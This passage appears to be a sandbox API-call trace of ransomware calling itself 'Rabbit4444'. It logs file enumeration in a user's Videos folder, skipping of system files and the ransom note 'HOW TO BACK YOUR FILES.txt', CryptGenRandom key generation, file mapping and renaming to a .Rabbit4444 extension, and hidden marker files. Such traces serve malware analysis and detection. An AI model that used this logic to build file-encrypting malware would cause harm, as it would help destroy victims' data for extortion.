lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13954125906) returned 1 [0048.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0048.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0048.231] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.231] CloseHandle (hObject=0x298) returned 1 [0048.231] CloseHandle (hObject=0x278) returned 1 [0048.234] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\54be.flv.Rabbit4444") returned 42 [0048.234] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\54be.flv" (normalized: "c:\\users\\fd1hvy\\videos\\54be.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\54be.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\54be.flv.rabbit4444"), dwFlags=0x1) returned 1 [0048.234] InterlockedExchangeAdd (in: Addend=0xff618, Value=35072 | out: Addend=0xff618) returned 15208720 [0048.234] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3307 [0048.234] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf1f470, ftCreationTime.dwHighDateTime=0x1d4c7ab, ftLastAccessTime.dwLowDateTime=0x90363010, ftLastAccessTime.dwHighDateTime=0x1d4d3c7, ftLastWriteTime.dwLowDateTime=0x90363010, ftLastWriteTime.dwHighDateTime=0x1d4d3c7, nFileSizeHigh=0x0, nFileSizeLow=0x15da9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7GblG1j-U_m.avi", cAlternateFileName="7GBLG1~1.AVI")) returned 1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="Rabbit4444.exe") returned -1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2=".") returned 1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="..") returned 1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="windows") returned -1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="bootmgr") returned -1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="pagefile.sys") returned -1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="boot") returned -1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="ids.txt") returned -1 [0048.235] lstrcmpiW (lpString1="7GblG1j-U_m.avi", lpString2="NTUSER.DAT") returned -1 [0048.235] lstrcpyW (in: lpString1=0x130eb66, lpString2="7GblG1j-U_m.avi" | out: lpString1="7GblG1j-U_m.avi") returned="7GblG1j-U_m.avi" [0048.235] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\7GblG1j-U_m.avi", dwFileAttributes=0x0) returned 1 [0048.235] lstrlenW (lpString="7GblG1j-U_m.avi") returned 15 [0048.235] lstrlenW (lpString="Rabbit4444") returned 10 [0048.235] lstrcmpiW (lpString1="1j-U_m.avi", lpString2="Rabbit4444") returned -1 [0048.235] lstrlenW (lpString=".dll") returned 4 [0048.235] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0048.235] lstrlenW (lpString=".lnk") returned 4 [0048.235] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0048.235] lstrlenW (lpString=".ini") returned 4 [0048.235] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0048.235] lstrlenW (lpString=".sys") returned 4 [0048.235] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0048.235] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\7GblG1j-U_m.avi" (normalized: "c:\\users\\fd1hvy\\videos\\7gblg1j-u_m.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.235] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.235] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13954626993) returned 1 [0048.236] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=89513) returned 1 [0048.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0048.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0048.236] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x160b0, lpName=0x0) returned 0x298 [0048.236] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160b0) returned 0x70000 [0048.238] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101738) returned 1 [0048.239] CryptGenRandom (in: hProv=0x101738, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0048.239] CryptReleaseContext (hProv=0x101738, dwFlags=0x0) returned 1 [0048.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.239] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13955020122) returned 1 [0048.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0048.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0048.240] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.240] CloseHandle (hObject=0x298) returned 1 [0048.240] CloseHandle (hObject=0x278) returned 1 [0048.243] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\7GblG1j-U_m.avi.Rabbit4444") returned 49 [0048.243] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\7GblG1j-U_m.avi" (normalized: "c:\\users\\fd1hvy\\videos\\7gblg1j-u_m.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\7GblG1j-U_m.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\7gblg1j-u_m.avi.rabbit4444"), dwFlags=0x1) returned 1 [0048.244] InterlockedExchangeAdd (in: Addend=0xff618, Value=89520 | out: Addend=0xff618) returned 15243792 [0048.244] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3308 [0048.244] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ff8cee0, ftCreationTime.dwHighDateTime=0x1d4d4f9, ftLastAccessTime.dwLowDateTime=0xa80b1890, ftLastAccessTime.dwHighDateTime=0x1d4cd0f, ftLastWriteTime.dwLowDateTime=0xa80b1890, ftLastWriteTime.dwHighDateTime=0x1d4cd0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ahcaYgdd_uS", cAlternateFileName="AHCAYG~1")) returned 1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="Rabbit4444.exe") returned -1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2=".") returned 1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="..") returned 1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="windows") returned -1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="bootmgr") returned -1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="pagefile.sys") returned -1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="boot") returned -1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="ids.txt") returned -1 [0048.244] lstrcmpiW (lpString1="ahcaYgdd_uS", lpString2="NTUSER.DAT") returned -1 [0048.244] lstrcpyW (in: lpString1=0x130eb66, lpString2="ahcaYgdd_uS" | out: lpString1="ahcaYgdd_uS") returned="ahcaYgdd_uS" [0048.244] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0048.244] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x46) returned 0x10b100 [0048.244] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6450 [0048.244] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.244] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.245] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.245] lstrcpyW (in: lpString1=0x130eb66, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.245] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", dwFileAttributes=0x22) returned 1 [0048.245] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", dwFileAttributes=0x6) returned 1 [0048.245] lstrlenW (lpString="desktop.ini") returned 11 [0048.245] lstrlenW (lpString="Rabbit4444") returned 10 [0048.245] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.245] lstrlenW (lpString=".dll") returned 4 [0048.245] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.245] lstrlenW (lpString=".lnk") returned 4 [0048.245] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.245] lstrlenW (lpString=".ini") returned 4 [0048.245] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.245] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d22190, ftCreationTime.dwHighDateTime=0x1d4cb9c, ftLastAccessTime.dwLowDateTime=0x87b7710, ftLastAccessTime.dwHighDateTime=0x1d4c99b, ftLastWriteTime.dwLowDateTime=0x87b7710, ftLastWriteTime.dwHighDateTime=0x1d4c99b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IGecK", cAlternateFileName="")) returned 1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2="Rabbit4444.exe") returned -1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2=".") returned 1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2="..") returned 1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2="windows") returned -1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2="bootmgr") returned 1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2="pagefile.sys") returned -1 [0048.245] lstrcmpiW (lpString1="IGecK", lpString2="boot") returned 1 [0048.246] lstrcmpiW (lpString1="IGecK", lpString2="ids.txt") returned 1 [0048.246] lstrcmpiW (lpString1="IGecK", lpString2="NTUSER.DAT") returned -1 [0048.246] lstrcpyW (in: lpString1=0x130eb66, lpString2="IGecK" | out: lpString1="IGecK") returned="IGecK" [0048.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0048.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3a) returned 0x114f28 [0048.246] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf64b0 [0048.246] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3df7050, ftCreationTime.dwHighDateTime=0x1d4c7de, ftLastAccessTime.dwLowDateTime=0x51f13f50, ftLastAccessTime.dwHighDateTime=0x1d4cf82, ftLastWriteTime.dwLowDateTime=0x51f13f50, ftLastWriteTime.dwHighDateTime=0x1d4cf82, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kagr0", cAlternateFileName="")) returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="Rabbit4444.exe") returned -1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2=".") returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="..") returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="windows") returned -1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="bootmgr") returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="pagefile.sys") returned -1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="boot") returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="ids.txt") returned 1 [0048.246] lstrcmpiW (lpString1="Kagr0", lpString2="NTUSER.DAT") returned -1 [0048.246] lstrcpyW (in: lpString1=0x130eb66, lpString2="Kagr0" | out: lpString1="Kagr0") returned="Kagr0" [0048.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0048.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3a) returned 0x114f70 [0048.246] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6590 [0048.246] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x158eba20, ftCreationTime.dwHighDateTime=0x1d4c7cf, ftLastAccessTime.dwLowDateTime=0x4968c110, ftLastAccessTime.dwHighDateTime=0x1d4cec8, ftLastWriteTime.dwLowDateTime=0x4968c110, ftLastWriteTime.dwHighDateTime=0x1d4cec8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kyLFwyj3y_- AKUbu7HT", cAlternateFileName="KYLFWY~1")) returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="Rabbit4444.exe") returned -1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2=".") returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="..") returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="windows") returned -1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="bootmgr") returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="pagefile.sys") returned -1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="boot") returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="ids.txt") returned 1 [0048.246] lstrcmpiW (lpString1="kyLFwyj3y_- AKUbu7HT", lpString2="NTUSER.DAT") returned -1 [0048.247] lstrcpyW (in: lpString1=0x130eb66, lpString2="kyLFwyj3y_- AKUbu7HT" | out: lpString1="kyLFwyj3y_- AKUbu7HT") returned="kyLFwyj3y_- AKUbu7HT" [0048.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0048.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x58) returned 0x115928 [0048.247] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6490 [0048.247] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab5794b0, ftCreationTime.dwHighDateTime=0x1d4d0a2, ftLastAccessTime.dwLowDateTime=0x20a0cbe0, ftLastAccessTime.dwHighDateTime=0x1d4c7f9, ftLastWriteTime.dwLowDateTime=0x20a0cbe0, ftLastWriteTime.dwHighDateTime=0x1d4c7f9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mr9We2Kb5L1oUgPF84r", cAlternateFileName="MR9WE2~1")) returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="Rabbit4444.exe") returned -1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2=".") returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="..") returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="windows") returned -1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="bootmgr") returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="pagefile.sys") returned -1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="boot") returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="ids.txt") returned 1 [0048.247] lstrcmpiW (lpString1="Mr9We2Kb5L1oUgPF84r", lpString2="NTUSER.DAT") returned -1 [0048.247] lstrcpyW (in: lpString1=0x130eb66, lpString2="Mr9We2Kb5L1oUgPF84r" | out: lpString1="Mr9We2Kb5L1oUgPF84r") returned="Mr9We2Kb5L1oUgPF84r" [0048.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6928 [0048.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x56) returned 0x115688 [0048.247] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6930 | out: ListHead=0xf68b0, ListEntry=0xf6930) returned 0xf6530 [0048.247] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb30affb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xa2f74ac0, ftLastAccessTime.dwHighDateTime=0x1d4c94c, ftLastWriteTime.dwLowDateTime=0xa2f74ac0, ftLastWriteTime.dwHighDateTime=0x1d4c94c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tKr", cAlternateFileName="")) returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="Rabbit4444.exe") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2=".") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="..") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="windows") returned -1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="bootmgr") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="pagefile.sys") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="boot") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="ids.txt") returned 1 [0048.247] lstrcmpiW (lpString1="tKr", lpString2="NTUSER.DAT") returned 1 [0048.247] lstrcpyW (in: lpString1=0x130eb66, lpString2="tKr" | out: lpString1="tKr") returned="tKr" [0048.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0048.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x36) returned 0x102950 [0048.247] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0048.247] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb30affb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xa2f74ac0, ftLastAccessTime.dwHighDateTime=0x1d4c94c, ftLastWriteTime.dwLowDateTime=0xa2f74ac0, ftLastWriteTime.dwHighDateTime=0x1d4c94c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tKr", cAlternateFileName="")) returned 0 [0048.248] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0048.248] lstrcpyW (in: lpString1=0x130eb66, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.248] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.248] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.248] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.249] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.249] CloseHandle (hObject=0x278) returned 1 [0048.249] CloseHandle (hObject=0x27c) returned 1 [0048.250] GetCurrentThreadId () returned 0xd98 [0048.250] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0048.250] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Videos\\tKr", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\tKr") returned="C:\\Users\\FD1HVy\\Videos\\tKr" [0048.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102950 | out: hHeap=0xe0000) returned 1 [0048.250] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0048.250] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\tKr" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\tKr") returned="C:\\Users\\FD1HVy\\Videos\\tKr" [0048.250] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\tKr", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\tKr\\") returned="C:\\Users\\FD1HVy\\Videos\\tKr\\" [0048.251] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\tKr\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\tKr\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\tKr\\.BFC0E91B00AE8A0620D3" [0048.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.251] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.254] FlushFileBuffers (hFile=0x27c) returned 1 [0048.256] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.256] CloseHandle (hObject=0x27c) returned 1 [0048.257] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\tKr") returned 26 [0048.257] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.257] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb30affb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xa2f74ac0, ftLastAccessTime.dwHighDateTime=0x1d4c94c, ftLastWriteTime.dwLowDateTime=0xe615fffc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0048.257] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.257] lstrcmpiW (lpString1=".", 